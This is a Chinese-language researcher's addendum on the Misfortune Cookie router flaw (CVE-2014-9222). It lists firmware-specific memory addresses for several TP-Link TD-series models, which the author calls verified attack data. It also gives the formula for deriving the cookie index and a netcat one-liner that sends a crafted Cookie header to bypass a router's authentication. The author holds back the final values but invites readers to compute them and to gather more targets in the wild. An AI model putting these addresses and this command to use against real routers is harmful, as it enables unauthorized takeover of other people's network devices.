标题: Misfortune Cookie漏洞(CVE-2014-9222)补遗

创建: 2015-04-14 11:14
更新: 2015-04-28 12:02
链接: https://scz.617.cn/misc/201504141114.txt

--------------------------------------------------------------------------
TD-8820

    3.0.0 Build 091223 Rel.23304

        C_Array = 0x803C3018
        authoff = 0x80397E69

TD-W8901G

    1.0.2 Build 080522 Rel.37708 (这是Piotr Bania所用版本)

        C_Array = 0x803E9A40
        authoff = 0x803AB30D

    3.0.1 Build 100603 Rel.28484

        C_Array = 0x8041B3D4
        authoff = 0x803DC701

    3.0.1 Build 100901 Rel.23594

        C_Array = 0x80420554
        authoff = 0x803E1829

    6.0.0 Build 110119 Rel.25581

        C_Array = 0x804FA3E0
        authoff = 0x804BB941

    6.0.0 Build 110915 Rel.06942

        C_Array = 0x80517454
        authoff = 0x804D7CB9

TD-W8901N

    1.0.0 Build 121121 Rel.08870 (这是Cawan所用版本)

        C_Array = 0x804163D4
        authoff = 0x8034FF94

TD-W8951ND

    1.0.0 Build 100723 Rel.23035

        C_Array = 0x803FD3F0
        authoff = 0x803D2D61

TD-W8961ND

    1.0.0 Build 100722 Rel.05210

        C_Array = 0x803FD3F0
        authoff = 0x803D2D61

    3.0.0 Build 120808 Rel.08330

        C_Array = 0x804269F4
        authoff = 0x803605B4
--------------------------------------------------------------------------

C_Array + evilnum * 0x28        = authoff

这里所有的四则运算都是"模0x100000000"四则运算。

要充分考虑这种情形:

( authoff - C_Array ) % 0x28   != 0

此时evilcookie必须进行适当填充，这还得看实际被破坏数据是否无关大碍。

echo -ne "GET / HTTP/1.0\r\nCookie: C<evilnum>=<evilcookie>\r\n\r\n" | nc -w 5 -n <target> 80

我没有找到可能存在的神技巧快速、稳定地远程确定这些值:

C_Array
authoff
evilnum
evilcookie

暂时计划在将来的日子里陆续手工收集这些数据，这依赖于我在野地里找到的测试目
标以及能否下载得到相关固件。

前面所列是用于攻击的精确数据，实测无误。为了避免为Script Kids所用，没有直
接显示evilnum、evilcookie。了解该漏洞原理的兄弟请自行推算。

日后我会更新前述列表。有兴趣收集此类数据的兄弟，我们可以一起干这件事。